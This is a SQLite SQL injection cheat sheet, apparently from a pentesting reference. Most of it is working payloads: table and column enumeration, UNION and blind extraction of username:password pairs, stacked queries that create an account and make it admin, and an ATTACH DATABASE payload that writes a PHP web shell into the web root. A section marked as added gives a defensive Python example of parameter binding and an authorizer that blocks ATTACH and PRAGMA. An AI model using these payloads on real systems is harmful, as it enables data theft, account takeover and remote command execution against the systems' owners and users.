Identification

SELECT sqlite_version()
-- Comment: -- or /* */
-- String concat: 'a'||'b'
-- No user system, no privileges

Information Gathering

SELECT sqlite_version()
SELECT typeof(1)                         -- Confirm SQLite

Enumerate Tables

SELECT name FROM sqlite_master WHERE type='table'
SELECT group_concat(name) FROM sqlite_master WHERE type='table'
SELECT sql FROM sqlite_master WHERE type='table'     -- Shows CREATE TABLE

Enumerate Columns

SELECT sql FROM sqlite_master WHERE type='table' AND name='users'
PRAGMA table_info(users)
The sql column shows the full CREATE TABLE statement with all column names and types.

Dump Data

SELECT group_concat(username||':'||password, char(10)) FROM users
SELECT username||':'||password FROM users

String Functions

Function                 Description
||                       Concatenate
SUBSTR(str,pos,len)      Substring
LENGTH(str)              String length
UNICODE(char)            Unicode code point
CHAR(n)                  Char from code point
UPPER(str)               Uppercase
LOWER(str)               Lowercase
REPLACE(str,old,new)     Replace
TRIM(str)                Trim whitespace
HEX(str)                 Hex encode
ZEROBLOB(n)              N zero bytes
GROUP_CONCAT(col)        Aggregate concat
GROUP_CONCAT(col,sep)    Concat with separator

Conditional

CASE WHEN condition THEN true_val ELSE false_val END
IIF(condition, true_val, false_val)        -- 3.32+

Time Delay

SQLite has no sleep function. Alternatives:
-- Heavy computation
AND 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000))))

-- Adjust RANDOMBLOB size for delay length

Error-Based

SQLite error messages are less verbose, so error-based extraction is limited:
AND 1=CAST((SELECT group_concat(name) FROM sqlite_master) AS int)

UNION

' UNION SELECT 1,2,3-- -
' UNION SELECT 1,group_concat(name),3 FROM sqlite_master WHERE type='table'-- -
' UNION SELECT 1,group_concat(username||':'||password),3 FROM users-- -

File Write — ATTACH DATABASE

'; ATTACH DATABASE '/var/www/html/shell.php' AS pwn; CREATE TABLE pwn.cmd (data text); INSERT INTO pwn.cmd VALUES ('<?php system($_GET["cmd"]); ?>');-- -
Writes a PHP web shell as an SQLite database file (the file is binary and contains the payload).

Boolean Blind

' AND SUBSTR((SELECT name FROM sqlite_master LIMIT 1),1,1)='u'-- -
' AND UNICODE(SUBSTR((SELECT name FROM sqlite_master LIMIT 1),1,1))>100-- -

Stacked Queries

Supported depending on driver:
'; INSERT INTO users VALUES ('hacker','pass');-- -
'; UPDATE users SET role='admin' WHERE username='hacker';-- -

No information_schema

SQLite uses sqlite_master instead:
Query                                                  Purpose
SELECT name FROM sqlite_master WHERE type='table'      List tables
SELECT sql FROM sqlite_master WHERE name='tbl'         Show CREATE statement
PRAGMA table_info(tbl)                                 Column info
PRAGMA database_list                                   Attached databases
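
Seen from the defending side, the sqlite_master and PRAGMA lookups above, the UNION strings and ATTACH DATABASE all depend on user input reaching the SQL parser. The following Python example is added here and is not part of the original page: it contrasts string concatenation with parameter binding, and installs a connection authorizer that refuses ATTACH, PRAGMA and schema-table reads. The users table, its row and all function names are constructed for illustration.

```python
import sqlite3

SCHEMA_TABLES = {"sqlite_master", "sqlite_schema",
                 "sqlite_temp_master", "sqlite_temp_schema"}

def restrict(action, arg1, arg2, dbname, source):
    # Authorizer callback, consulted while each statement is compiled.
    # Refuse ATTACH, every PRAGMA, and any read of the schema table.
    if action in (sqlite3.SQLITE_ATTACH, sqlite3.SQLITE_PRAGMA):
        return sqlite3.SQLITE_DENY
    if action == sqlite3.SQLITE_READ and arg1 in SCHEMA_TABLES:
        return sqlite3.SQLITE_DENY
    return sqlite3.SQLITE_OK

def make_db(hardened):
    # Constructed sample data: one table, one row.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'alice', 'hash-a')")
    db.commit()
    if hardened:
        db.set_authorizer(restrict)  # installed after the schema is created
    return db

def lookup_concat(db, name):
    # Vulnerable pattern: the input becomes part of the SQL text.
    sql = "SELECT id, username, password FROM users WHERE username = '" + name + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db, name):
    # Hardened pattern: the input is bound as a value and never parsed as SQL.
    sql = "SELECT id, username, password FROM users WHERE username = ?"
    return db.execute(sql, (name,)).fetchall()

def is_blocked(db, sql):
    # True when SQLite refuses to compile or run the statement.
    try:
        db.execute(sql).fetchall()
        return False
    except sqlite3.Error:
        return True

# UNION string copied from the UNION section of this page.
UNION_INPUT = "' UNION SELECT 1,group_concat(name),3 FROM sqlite_master WHERE type='table'-- -"

if __name__ == "__main__":
    plain, hard = make_db(False), make_db(True)
    print(lookup_concat(plain, UNION_INPUT))  # concatenation: schema names come back
    print(lookup_bound(plain, UNION_INPUT))   # binding: treated as a username, no rows
    print(is_blocked(hard, "PRAGMA table_info(users)"))
```

Parameter binding is the fix; the authorizer is a second layer that limits what any statement on that connection may touch.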

Type System

SQLite uses dynamic typing — any column accepts any type. No strict type enforcement. This means:
  • CAST errors are less common
  • Type-based detection may not work
  • No need to match column types in UNION
